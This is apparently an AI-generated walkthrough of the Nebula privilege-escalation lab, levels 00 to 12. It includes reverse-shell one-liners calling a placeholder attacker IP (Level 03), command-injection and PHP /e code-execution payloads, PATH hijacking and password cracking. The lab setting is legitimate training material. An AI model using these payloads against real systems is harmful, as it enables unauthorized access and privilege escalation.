Nebula Level 06 Description

The flag06 account credentials came from a legacy unix system.a To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

I’m happy to provide a detailed summary of the video, acting as a video summarizer expert! I’ll break down each level and the technical commands I observed.

Nebula Exploit Exercises: A Detailed Walkthrough

I recently went through the Nebula exploit exercises, which are fantastic for anyone starting out with Linux privilege escalation. I covered levels 00 through 12, demonstrating various techniques to gain higher privileges.

Getting Started

First, I explained how to download the Nebula ISO file and import it into VMware Workstation. To set up my workspace, I used two terminal tabs: one for logging into the Nebula virtual machine via SSH and another to act as a local listener for potential reverse shells.

Level 00: Finding a SetUID Program

My goal here was to find a Set User ID (SUID) program that runs as the flag00 account.

  • I logged in using ssh level00@<nebula_ip> with the password level00.
  • To find SUID programs owned by flag00, I used the command:Bashfind / -perm -u=s -type f 2>/dev/null
  • After identifying the correct binary, I navigated to its directory (e.g., cd /bin/.../flag00), listed the files with ls -la, and then executed the SUID binary using ./flag00.
  • Finally, I confirmed the challenge completion with getflag.

Level 01: Exploiting Environment Variables (Path Injection)

In this level, I exploited a program that was vulnerable due to how it called echo without an absolute path, allowing for arbitrary program execution.

  • I switched to the level01 user with su level01 (password: level01) and navigated to /home/flag01.
  • The flag01 program executed echo using the system’s PATH.
  • My exploit involved:
    1. Moving to a writable directory: cd /tmp
    2. Creating a symbolic link named echo that pointed to /bin/getflag: ln -s /bin/getflag echo
    3. Prepending the current directory (/tmp) to the PATH environment variable: export PATH=/tmp:$PATH
    4. Executing the vulnerable program: /home/flag01/flag01. This made the system run my custom echo (which was getflag) with flag01 privileges.

Level 02: Exploiting Environment Variables (Command Injection via sprintf and getenv)

Here, I exploited a program that used getenv to fetch an environment variable and then unsafely used its value in a system() call.

  • I switched to level02 using su level02 (password: level02) and went to /home/flag02.
  • The flag02 program used getenv("USER") and incorporated it into a command executed by system().
  • My exploit involved modifying the USER environment variable to include a command injection payload: export USER=';/bin/getflag;'. The semicolons allowed me to terminate the existing command and inject a new one.
  • Then, I executed the vulnerable program: ./flag02.

Level 03: Exploiting a Writable Cron Job Script

This level involved a cron job that regularly executed a script, which in turn executed files from a world-writable directory.

  • I switched to level03 with su level03 (password: level03) and navigated to /home/flag03.
  • I found that the writable.sh script iterated through and executed files in /home/flag03/writable.d/.
  • My exploit steps were:
    1. Navigate to the writable directory: cd writable.d
    2. Create a script to initiate a reverse shell:Bashecho 'nc -e /bin/bash <your_attacker_ip> <your_listener_port>' > shell.sh (I also noted an alternative netcat payload: echo 'bash -i >& /dev/tcp/<your_attacker_ip>/<your_listener_port> 0>&1' > shell.sh)
    3. Make the script executable: chmod +x shell.sh
    4. Then, I waited for the cron job to execute writable.sh, which would then run shell.sh, giving me a reverse shell as flag03.

Level 04: Bypassing File Access Restrictions with Symbolic Links

My goal in this level was to read a restricted “token” file. The flag04 program prevented direct access to the token file by its name.

  • I switched to level04 using su level04 (password: level04) and went to /home/flag04.
  • The flag04 program took a filename as an argument but blocked “token”.
  • My exploit involved:
    1. Going to a writable directory: cd /tmp
    2. Creating a symbolic link to the token file with a different name: ln -s /home/flag04/token mytoken (I used level04 as the link name in the video).
    3. Executing the program with the symbolic link as the argument: /home/flag04/flag04 /tmp/mytoken. This revealed the token.

Level 05: Weak Directory Permissions & SSH Key

This level focused on exploiting weak directory permissions to find an SSH private key.

  • I switched to level05 with su level05 (password: level05) and navigated to /home/flag05.
  • I discovered a backup directory .backup containing a compressed file (backups.tgz).
  • My exploit steps were:
    1. Copy the archive to a writable location: cp .backup/backups.tgz /tmp/
    2. Go to /tmp: cd /tmp
    3. Extract the archive: tar -zxvf backups.tgz. This extracted an .ssh directory with id_rsa (private key) and id_rsa.pub.
    4. I then attempted to use the private key to SSH as flag05: ssh -i /tmp/.ssh/id_rsa flag05@localhost (though I noted a VM issue during the video).

Level 06: Legacy Unix Password Hashing

My objective here was to crack a user’s password hash found in /etc/passwd.

  • I switched to level06 using su level06 (password: level06).
  • My commands were:
    1. View the password file: cat /etc/passwd.
    2. Copy the line for flag06 (containing the hash).
    3. On my attacker machine, I saved the line to a file (e.g., hash.txt).
    4. I cracked it using John the Ripper: john hash.txt (or john --show hash.txt if pre-cracked).
    5. Finally, I used the cracked password (“hello”) to su flag06.

Level 07: Command Injection in a Perl CGI Script

This level involved exploiting command injection in a Perl CGI script that pinged a host.

  • I switched to level07 with su level07 (password: level07) and went to /home/flag07.
  • The index.cgi script took a host parameter and used it unsafely in a ping command. The webserver (thttpd.conf) ran as flag07 on port 7070.
  • My initial local test exploit was: ./index.cgi host=127.0.0.1;ls
  • For the webserver exploit to run as flag07, I used:Bashwget "http://127.0.0.1:7070/index.cgi?host=127.0.0.1%3Bgetflag" -O /tmp/output (%3B is the URL encoding for ;).
  • I then checked the output with cat /tmp/output.

Level 08: Analyzing Network Capture (PCAP) for Credentials

My goal was to extract credentials from a provided PCAP file.

  • I switched to level08 using su level08 (password: level08).
  • A .pcap file was in the home directory.
  • My exploit steps were:
    1. Transfer the PCAP file to my attacker machine (e.g., using Python’s SimpleHTTPServer on Nebula: python -m SimpleHTTPServer 8000, and wget http://<nebula_ip>:8000/capture.pcap on the attacker).
    2. Open the PCAP in Wireshark.
    3. Follow the TCP stream.
    4. I carefully analyzed the hex view to account for backspaces (7F characters) to deduce the actual password. The typed password was “backd00r” then backspace three times (removing “00r”), then “M8” then backspace (removing “8”), then “@”. So the correct password was “backdM@”.
    5. Finally, I used su flag08 with the deduced password.

Level 09: PHP preg_replace /e Modifier Vulnerability

This level involved exploiting a PHP script that used preg_replace with the /e (evaluate) modifier, allowing code execution.

  • I switched to level09 with su level09 (password: level09).
  • There was a SUID wrapper flag09 that executed a PHP script flag09.php. The PHP script used preg_replace("/\
[email\](.*)\[\/email\]/e”, “…”, $filename);, where $filename was the first argument.
  • My exploit steps were:
    1. Go to /tmp: cd /tmp
    2. Create a file (e.g., exploit.txt) with the content: [email]${system($_SERVER['argv'])}[/email]

      . This crafted input matched the regex, and the /e modifier executed the captured string as PHP code. $_SERVER['argv'] would be the second argument passed to the flag09 wrapper.

      Execute the wrapper: /home/flag09/flag09 /tmp/exploit.txt getflag. Here, /tmp/exploit.txt became $filename for the PHP script, and getflag became $_SERVER['argv'], which was then executed by system().

      Level 10 & 11: Skipped Levels

      I decided to skip Level 10 (Time-of-Check to Time-of-Use - TOCTOU) because it's quite noisy and involves race conditions. I also skipped Level 11 due to an issue with its code.

      Level 12: Command Injection in Lua Script

      My final challenge was exploiting command injection in a Lua script listening on a port.

      • I switched to level12 using su level12 (password: level12).
      • I found a Lua script flag12.lua and a process listening on port 50001. The Lua script used io.popen("echo "..password.." | sha1sum"), making it vulnerable to command injection.
      • My exploit steps were:
        1. Connect to the service: nc 127.0.0.1 50001
        2. Send the payload as the password. The payload needed to inject a command. I used: anypassword'; /usr/bin/getflag > /home/flag12/test2; echo 'm. This injected the getflag command, redirecting its output to a file.
        3. Finally, I checked the output file: cat /home/flag12/test2

      Video Walkthrough

  • About the Author

    Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

    View Articles